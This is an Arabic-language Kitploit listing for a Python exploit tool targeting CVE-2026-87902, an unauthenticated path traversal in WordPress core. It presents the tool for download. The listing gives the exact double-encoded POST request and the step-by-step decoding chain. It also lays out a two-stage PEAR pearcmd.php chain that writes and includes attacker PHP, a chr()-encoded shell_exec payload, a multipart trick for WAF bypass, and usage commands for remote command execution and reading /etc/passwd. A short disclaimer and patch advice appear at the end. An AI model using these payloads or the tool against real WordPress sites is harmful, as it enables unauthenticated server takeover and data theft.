Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-87902 — أداة إثبات مفهوم وماسح ضوئي بلغة Python للثغرة CVE-2026-87902، وهي ثغرة اجتياز مسار في نواة WordPress تؤدي إلى LFI وتنفيذ تعليمات برمجية عن بُعد (RCE) عبر PEAR، مع تجاوز WAF والاستغلال الآلي. | Kitploit
أدوات/GitHubGitHub/bhideki/cve-2026-87902
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFأمن الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubbhideki/cve-2026-87902

CVE-2026-87902

أداة إثبات مفهوم وماسح ضوئي بلغة Python للثغرة CVE-2026-87902، وهي ثغرة اجتياز مسار في نواة WordPress تؤدي إلى LFI وتنفيذ تعليمات برمجية عن بُعد (RCE) عبر PEAR، مع تجاوز WAF والاستغلال الآلي.

1منذ يوم واحدلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-87902 — اجتياز المسار / تضمين الملفات المحلية / تنفيذ التعليمات البرمجية عن بُعد في نواة WordPress

تضمين ملفات محلية بدون مصادقة عبر اجتياز المسار مزدوج الترميز في محلّل قوالب الصفحات في نواة WordPress، مع سلسلة تنفيذ تعليمات برمجية عن بُعد قائمة على PEAR.

تفاصيل الثغرة

الحقلالقيمة
CVECVE-2026-87902
CVSS9.2 (حرجة) — CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CWECWE-98 — التحكم غير السليم باسم الملف لـ Include/Require
المتأثرWordPress 4.7.0 – 7.1.1
المُصلَّحWordPress 7.1.2 + تحديثات خلفية لجميع الفروع المدعومة
المصادقةلا شيء (بدون مصادقة)

السبب الجذري

تستدعي get_page_template() في wp-includes/template.php الدالة urldecode() على معامل الاستعلام pagename بعد أن تكون عملية التعقيم قد نُفِّذت بالفعل. تسلسل ../ مزدوج الترميز (%252E%252E%252F) يمر عبر فك الترميز الأول في PHP ليصبح %2E%2E%2F، وينجو من sanitize_title_with_dashes() (التي تحافظ على تسلسلات %xx)، ثم يُفكَّك ترميزه بواسطة استدعاء urldecode() المتأخر في WordPress إلى ../ — مما يسمح بالخروج من دليل القالب.

طريقة POST مطلوبة لأن redirect_canonical() تعود مبكرًا للطلبات غير GET/HEAD، مما يمنع تطبيع المسار قبل الوصول إلى التعليمات البرمجية المصابة.

مسار الاستغلال

root@kitploit:~
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded

page_id=2&pagename=templates%25252E%25252E%25252F%25252E%25252E%25252F...%25252Findex

1. PHP decodes POST body:     templates%252E%252E%252F%252E%252E%252F...%252Findex
2. WP sanitize preserves:     templates%2E%2E%2F%2E%2E%2F...%2Findex
3. get_page_template() urldecode(): templates/../../../index
4. locate_template() resolves: wp-content/themes/<theme>/page-templates/../../../index.php
5. file_exists() succeeds → include() executes the file

التأثير

  • تضمين الملفات المحلية — يتم تضمين وتنفيذ ملفات .php عشوائية خارج دليل القالب
  • تنفيذ التعليمات البرمجية عن بُعد — عبر سلسلة أدوات PEAR pearcmd.php (يتطلب تثبيت PEAR + register_argc_argv=On)

سلسلة تنفيذ التعليمات البرمجية عن بُعد عبر PEAR

يحقق طلبان مجهولان من نوع POST تنفيذ التعليمات البرمجية عن بُعد:

المرحلة 1 — تضمين pearcmd.php عبر اجتياز المسار. تصبح سلسلة الاستعلام /?+config-create+/<php-payload>+<output>.php هي argv الخاصة بـ PEAR. يكتب أمر config-create بيانات يتحكم بها المهاجم (بما في ذلك وسوم PHP) إلى دليل قابل للكتابة.

المرحلة 2 — تضمين الملف الذي كتبه PEAR. تُنفَّذ تعليمات PHP المضمّنة بصلاحيات خادم الويب.

تستخدم حمولات PHP ترميز chr() (<?=shell_exec(chr(105).chr(100))?>) لتجنب أحرف الاقتباس التي قد تُهرَّب بواسطة wp_magic_quotes().

الأداة

cve-2026-87902.py — فاحص آلي + ماسح LFI + مستغل RCE عبر PEAR. يستخدم http.client للتحكم الدقيق على مستوى البايت في الطلبات (بدون إعادة ترميز من المكتبة).

المتطلبات

Python 3.6+ (المكتبة القياسية فقط — بدون تبعيات pip)

الاستخدام

root@kitploit:~
# Check vulnerability only
python3 cve-2026-87902.py https://target.com --check

# Check with WAF bypass (multipart/form-data)
python3 cve-2026-87902.py https://target.com --check --multipart

# Specify page ID and traversal depth
python3 cve-2026-87902.py https://target.com -p 42 --depth 7

# LFI scan (default targets)
python3 cve-2026-87902.py https://target.com

# LFI scan with custom files
python3 cve-2026-87902.py https://target.com -f etc/passwd wp-includes/pluggable

# RCE via PEAR chain
python3 cve-2026-87902.py https://target.com --rce "id"

# Read a file via RCE
python3 cve-2026-87902.py https://target.com --read /etc/hostname

# Full options
python3 cve-2026-87902.py https://target.com --rce "whoami" \
    --pear /usr/local/lib/php/pearcmd \
    --output /tmp/wp-rce-payload \
    --multipart --timeout 30

ما الذي تقوم به

  1. كشف القالب — يستخرج القالب النشط من HTML، ويتحقق من وجود أدلة page-*
  2. اكتشاف الصفحات — يستعلم من REST API عن الصفحات المنشورة ذات القوالب الافتراضية
  3. اختبار اجتياز المسار — يجرب أعماقًا متعددة (1-12) بحمولات POST مزدوجة الترميز
  4. تجاوز WAF — يغلّف --multipart الحمولة في multipart/form-data للتهرب من مطابقة أنماط WAF
  5. مسح LFI — يضمّن ملفات WordPress المعروفة ويقارن أحجام الاستجابة بالأساس المرجعي
  6. RCE — سلسلة PEAR من مرحلتين مع حمولات مرمّزة بـ chr()

علامات المخرجات

العلامةالمعنى
[HIT]تم تضمين الملف بنجاح
[---]استجابة طبيعية (لم يتم تضمين الملف)
[???]الاستجابة تختلف بشكل ملحوظ — تستحق التحقيق
[WAF]محظور بواسطة WAF (403)
[ERR]فشل الاتصال

الشروط المسبقة

  • يجب أن يحتوي القالب النشط على دليل page-* (مثل page-templates/)
  • وجود صفحة منشورة واحدة على الأقل بالقالب الافتراضي
  • إصدار WordPress ضمن النطاق المتأثر (غير مُرقَّع)
  • لتنفيذ التعليمات البرمجية عن بُعد: pearcmd.php الخاص بـ PEAR قابل للقراءة + register_argc_argv=On + /tmp قابل للكتابة

المعالجة

قم بالتحديث إلى WordPress 7.1.2 أو أحدث إصدار أمني لفرعك (تتوفر تحديثات خلفية حتى 4.7).

المراجع

  • Robert Ressl — CVE-2026-87902 Write-up
  • WordPress Security Advisory — GHSA-7hp8-65ch-5whp
  • Hadrian Vulnerability Alert

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض اختبار الأمان المصرّح به وأبحاث مكافآت الثغرات فقط. استخدمها فقط ضد الأنظمة التي لديك إذن صريح باختبارها. الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني.

تنزيل الأداة